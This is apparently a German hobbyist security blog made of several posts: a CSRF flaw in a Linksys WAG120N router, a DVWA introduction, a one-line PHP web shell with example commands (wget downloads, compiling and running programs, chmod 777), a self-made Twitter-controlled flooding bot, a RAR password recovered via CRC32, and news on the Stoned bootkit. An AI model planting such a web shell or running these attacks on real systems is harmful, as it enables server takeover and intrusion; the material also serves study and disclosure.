Habe mir heute mal meinen Cisco Linksys WAG120N unter die Lupe genommen und auch gleich eine sehr lustige Sicherheitslücke entdeckt.
Gleich vorneweg, ein mögliches Angriffsszenario bedarf ein wenig Fingerspitzengefühl, da wir vor der eigentlichen Lücke einen htaccess überwinden müssen, mit ein wenig Kreativität könnte so ein Angriff allerdings gelingen.
Wie würde so ein fiktives Angriffsszenario aussehen?
Man lockt einen potentiellen Linksys WAG120N Nutzer auf seine Seite und bringt ihn dazu sich auf seinem Router einzuloggen.
Vielleicht beginnen wir mit der Meldung:
“Nutzt Ihr Linksys auch diese Firmware: V1.00.12, dann sollten Sie hier weiterlesen”.
Am Anschluss einen etwas längeren Text gefolgt von einem, na sagen wir mal:
<?php sleep(60);?>
Soviel zur fiktiven Vorbereitung, jetzt bräuchten wir noch eine entsprechende Lücke im System (der htaccess ist nun lange genug geöffnet).
Ich schaute mir also einmal den Request an um irgend eine Angriffsmöglichkeit zu finden:
Da die Linksys Macher mit der Möglichkeit eines XSRF Angriffes mit Sicherheit gerechnet haben, bauten Sie in den Request so Sachen ein wie: sysname, sysPasswd und sysConfirmPasswd.
Wir müssen hierbei wissen, dass der Standardlogin admin / admin lautet.
Wenn wir uns obiges Bild anschauen, dann sehen wir – Benutzer: admin stimmt, Passwort: 123456 – das ist aber nicht mein Passwort …
Meine Überlegung:
Die Macher wussten ganz genau, dass ein plain Request ohne weitere Schutzmechanismen eine Gefahr darstellt vielleicht waren Sie einfach zu faul was passendes zu coden und machtes es ähnlich wie die Hainschwebfliege in der Tierwelt.
Ich beschnitt also den entsprechenden Request um meine Überlegung zu testen.
… und um sicher zu sein, dass nicht irgend eine generierte Session im Browser als Schutzmechanismus wütet, löschte ich die cookies und schickte dann die beschnittene Anfrage ab … und siehe tada, wir haben die Remote-Verwaltung aktiviert.
So lange noch kein Securityfix besteht, sollten alle WGA120N Nutzer folgendes beherzigen:
Einloggen – Änderungen vornehmen etc. – Browser ganz schließen (löscht den htaccess).
Eine Meldung an Cisco wurde bereits verschickt.
Vor kurzem wurde ich von einem netten Youtube Bekannten zu meiner Meinung zu einem Tutorial gefragt.
Bsp. Video:
http://www.youtube.com/watch?v=z3eaVLchM34
Ich machte mir die Mühe das entsprechende Video zu kommentieren und da ich versprochen habe bei entsprechender Nachfrage (Umfrage), ein passendes Tutorial online zu stellen – hier ist es:
Über ein eher schlechtes Video bei SecurityTube, wurde ich auf die Anwendung Damn Vuln Web App aufmerksam.
Hab mir das Teil mal eben auf nen Xampp der Windowskiste gelegt und ein paar Minuten damit rum gespielt.
Klasse an der App – man hat Zugriff auf den PHP Source, falls man doch bei der einen oder anderen Aufgabe nicht weiter kommt.
Dvwa beinhaltet Angriffsmöglichkeiten aus dem Bereich XSS, XSRF, SQL Inject, File Inclusion, PHP Fileupload, Login Bruteforce, Command Execution, wobei insgesamt 3 unterschiedliche Schwierigkeitsstufen zur Verfügung stehen.
Nettes Spielzeug meiner Meinung nach, dass man sich mal für “Zwischendurch” anschauen kann.
XSS:
SQL Injection:
PHP Fileupload:
Command Execution:
Das eigene Netzwerk gesondert absichern, hört sich jetzt erstmal bescheuert an – entweder bin ich online und stelle mich hier den Gefahren “Viren, Würmer Trojaner und den ganzen bösen Hackersachen. oder ich gehe auf Nummer Sicher und bleibe mit meinem PC am besten offline – so wird es uns in diversen Computerzeitschriften gepredigt, also muss es wohl stimmen.
Bevor es hier aber ans Eingemachte geht noch einen kleinen rechtlichen Hinweis:
Die hier genannten / gezeigten tools sind meiner Meinung nach sogenannte “dual use tools” – sprich sie können für seriöse Sicherheitstes, aber auch für Straftaten genutzt werden (Einbruch in Netzwerke, Ausspähen von Daten etc.).
Die von mir eingesetzten “tools” befinden sich alle in den Debian / Ubuntu Backports und da ich sowohl der Debian als auch der Ubuntugemeinde unterstelle, dass sie keine Illegalen Dinge in Ihren Backports haben, gehe ich hier von so genannten dual use tools aus.
Einen entsprechenden Vortrag eines Fachanwaltes für Informationstechnologierecht (Dominik Boecker)über die rechtliche Bedeutung dieser tools durfte ich beim 26C3 beiwohnen.
Weitere Infos zum Thema dual use findet Ihr hier:
blog.beck.de
… und natürlich “Wer unberechtigt in fremde Systeme eindringt, Daten ausspäht, verändert oder anderweitig Missbrauch treibt macht sich strafbar”.
PHP Shells gibt es wie Sand am Meer und nicht immer werden diese auch zu legalen Mitteln eingesetzt.
Mit einer C99 konnte ich vor einigen Jahren einen Bekannten aus dem örtlichen Computerclub bei seinem Problem helfen (PHPMyAdmin ging irgendwie nicht und aus dem cms hatte er sich ausgesperrt, lediglich ftp-Zugang bestand noch).
Da in der C99 eine Art PHPMyAdmin integriert ist, konnte ich so den MD5 in der Datenbank ändern.
Die letzten Tage habe ich mit einer PhpMiniShell experimentiert, die eigentlich nur einen PHP Befehl beinhaltet shell_exec.
Wer seinem Server nicht im PHP Safemode fährt und die entsprechenden Schreibrechte im aktuellen www Ordner hat, kann diese Minishell für diverse Aufgaben nutzen.
<?php $output = shell_exec($_GET['hoo']); echo “<pre>$output</pre>”; ?>
Die Shell wird mittels GET aufgerufen, Bsp:
http://www.deineseite.de/ordnermitschreibrechten/minishell.php?hoo=[DEIN SHELLBEFEHL]
In der Regel ist der Apache nicht mit root Rechten ausgestattet meine Versuchen einen Debian Lenny (aktuelle Updates eingespielt) mit dieser Minishell zu kompromittieren gelang mir nicht.
Trotzdem sollte die Shell mit Bedacht eingesetzt werden – am besten hinter einen .htaccess Verzeichnisschutz legen.
Was könnt Ihr mit der Shell alles machen?
Am besten selber testen 
Was funktioniert:
ls -l (Verzeichnis ausgeben lassen)
mv datei.txt datei.php (mv=move bewegen, macht aus datei.txt -> .php)
wget http://seite.de/resource.txt (Download mittels wget)
perl perlscript.pl (Aufrufen von Perlscripten – Ausgabe im Browser)
gcc -o code source.c (kompilieren von C Code mittels gcc)
./code (Starten von Programmen)
chmod 777 datei.php (Zugriffsrechte ändern).
curl http://ww.google.de (Quasi ein Proxy, wenn curl installiert ist … !!! Ref.Grabbing – .htacces Pflicht !!!)
more /keinwwwverzeichnis/dateiname.foo (Inhalt einer Datei ausgeben)
find /* | grep .txt (auf dem gesamten Server nach .txt suchen und auflisten)
pwd (den absoluten Pfad zur Shell ausgeben)
….. und und und – einfach selber testen und vielleicht hier die Liste ergänzen.
Viel Spaß beim shellen – euer hoo
Fanaticz nutzt die MiniShell übrigens schon seit Jahren für seine Projekte (natürlich nur für legal Dinge 
).
Update: Die “ (in der shell) müssen durch richtige ” ersetzt werden, da Worpress hier den Code filtert.
Aktuell wird in den Medien (online und sogar im Fernsehen) von einem aktuellen Twitter Botnet Construktion Kit geredet.
Wie hart auch, da stellt Jemand ein Construktion Kit online mit dem man DDOSsen kann, einfach einen Twitter Account anlegen, 2 mal klicken und schwups hast Du ein Botnet.
Jetzt nur noch die .exe unters Volk bringen und dem Flooder steht nichts mehr im Wege.
Klar ist, wer solch ein Construktionkit in Umlauf bringt Backdoort das Kit selber, vermutlich funktionieren die Bots nur eine gewisse Zeit bis sie schließlich nurnoch ihrem wahren Meister dienen .
Meiner Meinung nach ist der Hype ein wenig übertrieben – siehe google (ich erspare mir jetzt die ganzen Seiten zu verlinken).
Ich machte einmal einen Test wie lange man braucht einen Bot zu schreiben, der auch das macht was man ihm via twitter sagt (inklusive Flooderfunktion).
Für das Schreiben inklusive dem registrieren eines Twitter Accountes brauchte ich weniger als eine Stunde.
Das Ergebnis habe ich in einem Demovideo festgehalten.
Update:
Mir war gerade langweilig und da habe ich noch eine Funktion eingebaut, dass der Bot über das bestehende
Twitterkonto mit dem Meister kommunizieren kann.
Kleines Demo gibt es hier (das .ogv kann man direkt im Firefox anschauen)
FileUser war so nett sein Einverständnis zur Veröffentlichung seines Lösungsweges zu geben:
Hier einmal die Auflösung: Da ich Bruteforce von Anfang an ausgeschlossen habe maximal mit Hilfe eines Cloud-Dienstes),habe ich nach anderen Angriffspunkten gesucht. In diesem Fall war es sehr einfach, denn du hattest nur die Zahl in die .txt Datei im RAR Archiv geschrieben. Mein Ansatz: Die Datei war ursprünglich, also vor dem Komprimieren 3 Byte groß, das entspricht einem Inhalt von 3 Zeichen. Also habe ich einfach darauf gehofft, dass du nur die Zahl in der Datei als Inhalt hast und keine anderen Zeichen. Dies schränkte den Bereich der möglichen Zahlen schon einmal auf 100 bis 999 ein. Jetzt suchte ich nach einem Weg, die Zahl bestimmen zu können und dabei kam mir eine Eigenschaft von WinRAR zu Hilfe. WinRAR speichert für jede Datei in der Archivdatei den CRC32-Hashwert mit, damit nach dem Dekomprimieren der Datei überprüft werden kann, ob das Archiv beim Transport beschädigt wurde und die beinhalteten Dateien dadurch vielleicht unbrauchbar geworden sind. Hier einmal der CRC32-Teil aus dem Hexdump: D6 93 A0 4B Jetzt sind nur noch die Stellen zu vertauschen (4 <-> 1, 3 <-> 2), da der Hashwert umgekehrt gespeichert wird. Damit war es jetzt sehr leicht ein kleines Programm zu schreiben, was bei allen Zahlen von 100 bis 999 den CRC32-Wert berechnet und mit dem gegebenen Hashwert, den ich aus der Datei extrahiert haben zu vergleichen. Das Ergebnis war dann 411, mit dem gesuchten Hashwert (4b a0 93 d6). Zum Rapidshare Konto - der Zugang ging an FileUser raus (er hat geschrieben, dass ER ihn verschenkt und nicht ich ihn auf hoos Area verschenken soll ... wie der Eine oder Andere hier angenommen hat)
Gerde eben wurde auf wordpress-Deutschland eine neue Sicherheitslücke veröffentlicht – betroffen sind alle aktuellen Wordpress Versionen.
Über eine leicht geänderte URL soll es auch normalen Abonnenten möglich sein, Einstellungen im Style sowie der Plugins vorzunehmen.
Es wird angeraten die Registrierung zu deaktivieren und alle User zu löschen.
… die selbst programmierten Sachen sind einfach besser, wobei ich hier nicht anmaßend sein möchte – wordpress ist ein klasse CMS, aber es gibt halt einiges zu beachten, wenn man sich solchen “public stuff” antut.
Nachdem ich das neue Werbescript auf hoohost gehauen habe, ist mir heute auf der Arbeit eine gravierende Sicherheitslücke aufgefallen.
Das Adminpanel lässt sich mit wenigen “Handgriffen” komplett übernehmen.
Bis die Lücke gefixt ist, gibt es erst einmal keinen Zugriff zum Statistik Panel.
Mal sehen wann ich Zeit finde das Problem anzugehen (vielleicht erhalte ich ja ein wenig Unterstützung von dem Einen oder Anderen).
Zitat:
Windows-Hacking TrueCrypt Verschlüsselung umgangen
Der österreichische Hacker Peter Kleissner hat ein Bootkit mit dem Namen “Stoned” entwickelt, welches die TrueCrypt-Verschlüsselung auf 32-Bit-Windows-Systemen aushebelt.
Auf der Blackhat-Konferenz hat der Peter Kleissner ein sogenanntes “Bootkit” vorgestellt. Dabei handelt es sich um ein “Rootkit”, welches im Bootsektor der Harddisk ausgeführt wird und von hier aus, das gesamte System manipulieren kann. Hier ist auch die Schwachstelle an der TrueCrypt-Festplattenverschlüsselung, beziehungsweise den Windows-Systemen zu finden: Der Bootsektor der Festplatte wird nicht verschlüsselt. “Stoned” ist also in der Lage, die vollständige Partitions- und Systemverschlüsselung einfach auszuhebeln.Betroffen sind alle gängigen 32-Bit-Windows-Systeme, also konkret von Windows 2000 bis zu Windows Vista und selbst die aktuellste Version von Window 7. Malware-Phisher könnten so Rechner infizieren und völlig unbemerkt von Anti-Viren-Software innerhalb des Systems agieren. Peter Kleissner sagt, dass aus seiner Sicht drei mögliche Gruppen von “Stoned” profitieren können: zum einen Black-Hat-Hacker, zum anderen Ermittlungsbehörden, da sie beispielsweise unbemerkt das System ausspähen oder die Verschlüsselung einer Festplatte aushebeln können.
Und zum dritten: Microsoft.
Als wäre das nicht schon genug des potenziellen Ärgers, so will Peter Kleissner “Stoned” in kürze als Open-Source Framework veröffentlichen. Über eine Plug-In-Schnittstelle soll es ein leichtes sein, Anwendungen für das Rootkit zu entwickeln, welche bekanntermaßen vom Betriebssystem unbemerkt bleiben würden. “Stoned” könnte so zum Beispiel als Grundlage für einen “Bundestrojaner” dienen. Die Schwachstelle ist bei allen Windows-Betriebssystemen, dass der Master Boot Sektor unverschlüsselt bleibt.
Quelle –> klick
Die Möglichkeiten Trucrypt per “infizierten Bootloader” zu komprimitieren, haben wir hier bereits vor einiger Zeit schon behandelt.
Schön dass sich Einige die Mühe machten, die Lücken der Allgemeinheit offen zu legen.
